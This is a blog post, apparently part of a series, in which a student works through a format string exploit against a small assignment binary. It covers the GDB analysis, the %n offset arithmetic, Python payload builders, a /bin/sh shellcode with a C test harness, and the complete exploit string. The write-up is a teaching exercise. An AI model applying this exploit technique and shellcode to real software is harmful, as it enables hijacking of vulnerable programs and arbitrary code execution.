Part 1:
https://dev.to/duracellrabbid/journey-to-understand-format-string-attack-part-1-5dda
As I mentioned in Part 1, one of my motivations for writing these posts was that it took me a freaking long time to understand how a format string attack works. To give you some context, I first learned about it in late 2021/early 2022, and it took me a good 2.5 years to fully understand how it works. Still, I wanted to share my learning journey and where I eventually ended up.
The Task
Here, I will move on to the assignment that propelled me into this journey. In my assignment, I was asked to run a shellcode using a "memory exploit" in the program. The source code was provided and looked something like this:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int vul1(char *arg)
{
    char buffer[400];
    // arg is passed as the format string itself: this is the vulnerability
    snprintf(buffer, sizeof buffer, arg);
    return 0;
}
int main(int argc, char *argv[])
{
    if (argc != 2)
    {
        fprintf(stderr, "cstarget: argc != 2\n");
        exit(EXIT_FAILURE);
    }
    vul1(argv[1]);
    return 0;
}
The code can be compiled with gcc using the following flags:
-mpreferred-stack-boundary=2 -ggdb -m32 -L/usr/lib32 -fno-stack-protector
Unfortunately, the source code and compilation flags were for reference only. I had to perform the attack on the given binary, with ASLR turned off.
Analysis
First of all, we can see that the binary needs to be run with one, and only one, argument.
Then it uses snprintf to print this argument into buffer, which holds 400 chars. Initially, I thought this could be done with a buffer overflow, but snprintf checks against the size of buffer (sizeof buffer), so it never writes more than 400 bytes. That makes a BoF attack unviable.
We are talking about format string vulnerabilities, right? Guess what? We have snprintf, and our argument is passed straight in as its format string!
snprintf does not produce any output on the screen. It formats the string according to the format specifiers and writes at most the specified number of bytes into a buffer. A quick run of the binary with an argument confirms that nothing is printed.
No fear though! We have GDB. GDB is our friend. Let's bring along GEF for the ride as well.
From the screenshots, I noticed that buffer is at $esp. The saved return address is stored at offset +0x198 from buffer. I also noted that the saved instruction address (the return address back into main) is 0x56556236.
The simplest approach is to overwrite this saved return address so that it points to my shellcode. Since the stack is executable, there are 3 potential places where I can put the shellcode: buffer, arg and environment variables. I chose buffer as it is the easiest.
In addition, I observed one issue. Look at the screenshot where I planted 64 NOPs into the stack.
Note that the start of buffer changes as the size of the argument for vul1 increases. This is kind of expected. Remember my ugly hand-drawn stack in Part 1:
The argument string itself is stored near the top of the stack, above the stack frames, so a bigger argument pushes buffer (and everything else below it) further down.
Is that a concern for us? Yes and no. If we are not careful, the addresses that we need to write to will be wrong. However, if we construct the format string carefully, we can get the addresses exactly where we want them.
The format string
In this round, my approach will be:
<shellcodes> + <NOP paddings> + <address1> + <address2> + %Ax%G$n%Bx%H$n
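Shellcode + NOPs = 64 bytes (you can try any number that is a multiple of 4)
address1 = the stack address that holds the saved return address
address2 = address1 + 0x2
A = low-order 2 bytes of buffer's starting address - 64 - 8 (the 64 bytes of shellcode + NOPs and the two 4-byte addresses are output before %Ax)
B = high-order 2 bytes of buffer's starting address - low-order 2 bytes of buffer's starting address
G = (64 / 4) + 1 = 17, the argument position that lines up with address1
H = G + 1 = 18, the argument position that lines up with address2
Since %n stores the number of characters output so far, the first write puts 72 + A (the low half of the shellcode address) at address1, and the second puts 72 + A + B (the high half) at address2.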
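To make the recipe concrete, here is a small Python sketch that turns the two addresses into the pieces of the format string. It assumes a 32-bit little-endian target, a 64-byte shellcode + NOP prefix, that the first variadic argument of snprintf lines up with the start of buffer (which is what G = 64/4 + 1 implies), and that the high half of the shellcode address is larger than the low half. The function name `format_params` is my own, purely for illustration.

```python
import struct

def format_params(buf_addr: int, ret_slot: int, prefix_len: int = 64):
    """Compute address1, address2, A, B, G, H for
    <prefix> + <address1> + <address2> + %Ax%G$n%Bx%H$n (hypothetical helper)."""
    if prefix_len % 4:
        raise ValueError("prefix must be a multiple of 4 bytes")
    low = buf_addr & 0xFFFF            # low-order 2 bytes of the shellcode address
    high = buf_addr >> 16              # high-order 2 bytes
    if high < low:
        raise ValueError("this simple layout needs high >= low")
    address1 = struct.pack("<I", ret_slot)       # receives the low half
    address2 = struct.pack("<I", ret_slot + 2)   # receives the high half
    already_printed = prefix_len + 8             # prefix + two 4-byte addresses
    A = low - already_printed
    B = high - low
    G = prefix_len // 4 + 1
    H = G + 1
    return address1, address2, A, B, G, H

print(format_params(0xffffcdb4, 0xffffcf4c))
```

Plugging in the addresses found later in GDB (0xffffcdb4 and 0xffffcf4c) gives A = 52588, B = 12875, G = 17 and H = 18.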
Sounds abstract? I guessed as much. Let's use Excel to visualize the stack.
A few observations here:
- The shellcode is at the start of buffer. This is because the starting address of buffer is relatively easy to obtain. Not every day is a Saturday, so when you get the chance to be lazy, you take it.
- The NOPs are there to align the stack. Imagine we did not have the NOPs: the addresses would straddle two stack positions, and we would not be able to obtain the full addresses. Padding with NOPs ensures that our addresses will always be at the 17th and 18th positions on the stack. (Take 1 position on the stack as 4 bytes, since we are working on 32 bits.)
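As a rough illustration of why the padding matters, this Python sketch maps a byte offset inside buffer to the positional argument number that %N$ would use. It assumes, as above, that argument 1 is the first 4 bytes of buffer on a 32-bit target; `arg_slot` is a hypothetical helper name.

```python
def arg_slot(offset: int):
    """Return (positional argument number, byte offset inside that 4-byte slot)."""
    return offset // 4 + 1, offset % 4

# With 64 bytes of shellcode + NOPs, address1 sits at offset 64 and address2 at 68:
print(arg_slot(64), arg_slot(68))   # (17, 0) (18, 0): each starts a fresh slot

# With the bare 45-byte shellcode and no padding, address1 would start at offset 45:
print(arg_slot(45))                 # (12, 1): split across slots 12 and 13
```

A non-zero second value means the address is split across two positions, so no single %N$n can use it.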
Finding the addresses
I like to break my tasks down into smaller pieces. Let's break the format string into steps.
- 64 NOPs, as placeholders for the shellcode:
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64)")
- 64 NOPs + the 2 placeholder addresses:
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4)")
- The entire format string with placeholder values (using %x instead of %n, so nothing gets written yet):
run $(python3 -c "import sys; sys.stdout.buffer.write(b'\x90'*64 + b'\xff' * 4 + b'\xee' * 4 + b'%12356x%17\$x%12345x%18\$x')")
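If you prefer keeping the stages in one script instead of retyping one-liners, a sketch like the following builds the same three placeholder payloads as bytes and writes the chosen one to stdout. The stage numbering, the `STAGES` name and the filename `stages.py` are my own assumptions. Stage 3 still uses %x, so snprintf only reads the 17th and 18th arguments and writes nothing through them.

```python
import sys

NOPS = b"\x90" * 64                 # stand-in for shellcode + padding
ADDR1 = b"\xff" * 4                 # placeholder for address1
ADDR2 = b"\xee" * 4                 # placeholder for address2
FMT = b"%12356x%17$x%12345x%18$x"   # %x only reads; nothing is written yet

STAGES = {
    1: NOPS,
    2: NOPS + ADDR1 + ADDR2,
    3: NOPS + ADDR1 + ADDR2 + FMT,
}

if __name__ == "__main__":
    stage = int(sys.argv[1]) if len(sys.argv) > 1 else 3
    sys.stdout.buffer.write(STAGES[stage])
```

In GDB this would be used as `run $(python3 stages.py 3)`. Because the `$` now lives inside the Python file rather than on the shell command line, it no longer needs the `\$` escape.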
From here, we know that our shellcode will start at 0xffffcdb4 (the start of buffer). We also know that the saved eip is stored at 0xffffcf4c, which is 0x198 bytes above buffer, matching the offset we saw earlier. With this information:
address1 = \x4c\xcf\xff\xff (0xffffcf4c, little-endian)
address2 = \x4e\xcf\xff\xff (0xffffcf4e, little-endian)
A = 0xcdb4 - 72 = 52660 - 72 = 52588
B = 0xffff - 0xcdb4 = 65535 - 52660 = 12875
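To check that two %n writes really produce the full address, here is a small Python model of them (a simulation, not glibc). It assumes, as on this 32-bit target, that %n stores the running character count as a 4-byte little-endian int, and that %52588x outputs exactly 52588 characters because the printed hex value is far shorter than the width. Note that the second write overlaps the first and also spills 2 bytes past the saved return address.

```python
import struct

RET_SLOT = 0xffffcf4c          # stack address holding the saved return address (from GDB)
A, B = 52588, 12875
PRINTED_BEFORE = 64 + 8        # shellcode + NOPs + address1 + address2

# Model 8 bytes of stack starting at RET_SLOT: the original saved return
# address followed by 4 arbitrary bytes.
mem = bytearray(struct.pack("<I", 0x56556236) + b"\x00" * 4)

def percent_n(addr: int, count: int) -> None:
    """Model %n: store `count` as a 4-byte little-endian int at `addr`."""
    off = addr - RET_SLOT
    mem[off:off + 4] = struct.pack("<I", count)

count = PRINTED_BEFORE + A     # characters output before %17$n
percent_n(RET_SLOT, count)     # %17$n writes through address1
count += B                     # %12875x adds B more characters
percent_n(RET_SLOT + 2, count) # %18$n writes through address2

new_ret = struct.unpack("<I", mem[0:4])[0]
print(hex(count - B), hex(count), hex(new_ret))   # 0xcdb4 0xffff 0xffffcdb4
```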
The shellcode
For the purpose of the exercise, we will use the following shellcode from this article:
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh"
The next question is, how do we know if the shellcode works? We can test it with a simple C program.
// Filename: shellcode.c
// Compile: gcc -m32 -z execstack -fno-stack-protector shellcode.c -o shellcode
#include <stdio.h>
#include <string.h>
void callShell(void) {
    // Not const: this shellcode writes into the bytes right after "/bin/sh" at run time
    char code[] =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    // strlen() returns size_t, so print it with %zu
    printf("Shellcode Length: %zu\n", strlen(code));
    // Treat the bytes on the (executable) stack as a function and jump to them
    ((void (*)(void))code)();
}
int main(void)
{
    callShell();
    return 0;
}
Nice, the length of the shellcode is 45, so we just need 19 more NOPs to pad it to 64 bytes. Some of you may have noticed that I could have padded just 3 more NOPs to reach 48, which is also a multiple of 4. But I like 64, so I went with 64.
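A quick Python cross-check of the length and padding numbers, assuming the shellcode bytes above. It also checks for NUL bytes, since argv[1], and therefore the format string, would be cut short at the first \x00.

```python
SHELLCODE = (
    b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    b"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    b"\x80\xe8\xdc\xff\xff\xff/bin/sh"
)

PREFIX_LEN = 64
assert b"\x00" not in SHELLCODE, "a NUL byte would truncate argv[1]"

pad_to_64 = PREFIX_LEN - len(SHELLCODE)   # NOPs needed for a 64-byte prefix
pad_min = -len(SHELLCODE) % 4             # smallest pad to reach a multiple of 4
print(len(SHELLCODE), pad_to_64, pad_min) # 45 19 3
```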
shellcode + NOPs = \xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
Putting it all together with address1, address2, A = 52588, B = 12875, G = 17 and H = 18, the full format string should be:
\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x4c\xcf\xff\xff\x4e\xcf\xff\xff%52588x%17$n%12875x%18$n
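For completeness, here is a Python sketch that assembles the final argument from the <shellcodes> + <NOP paddings> + <address1> + <address2> + %Ax%G$n%Bx%H$n recipe and writes it to stdout, in the same spirit as the earlier one-liners. The two addresses are the ones found in GDB for this particular binary with ASLR off; they will differ on another machine, and stack addresses can also shift between runs inside and outside GDB because the environment differs. `exploit.py` is a hypothetical filename.

```python
import struct
import sys

SHELLCODE = (
    b"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    b"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    b"\x80\xe8\xdc\xff\xff\xff/bin/sh"
)
BUF_ADDR = 0xffffcdb4    # start of buffer (where the shellcode lands), from GDB
RET_SLOT = 0xffffcf4c    # stack address holding the saved return address, from GDB
PREFIX_LEN = 64

prefix = SHELLCODE + b"\x90" * (PREFIX_LEN - len(SHELLCODE))
address1 = struct.pack("<I", RET_SLOT)
address2 = struct.pack("<I", RET_SLOT + 2)
A = (BUF_ADDR & 0xFFFF) - (PREFIX_LEN + 8)
B = (BUF_ADDR >> 16) - (BUF_ADDR & 0xFFFF)
G = PREFIX_LEN // 4 + 1
H = G + 1

payload = prefix + address1 + address2 + f"%{A}x%{G}$n%{B}x%{H}$n".encode()

if __name__ == "__main__":
    sys.stdout.buffer.write(payload)
```

Inside GDB it would be run as `run $(python3 exploit.py)`.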
Now let's test it out:
YES! A shell opens. Mission accomplished? Not quite. There is more to the assignment, but it is beyond the scope of this write-up.
...One more thing
In essence, this should not be a difficult exercise for most seasoned CTF players. However, it is easy to run into segmentation faults when working with format string attacks, which can be frustrating for beginners like me. I found that the best thing to do is to break the task down into smaller pieces and figure out each piece individually.
To quote Dr Andrew Wiles: I think I'll stop here.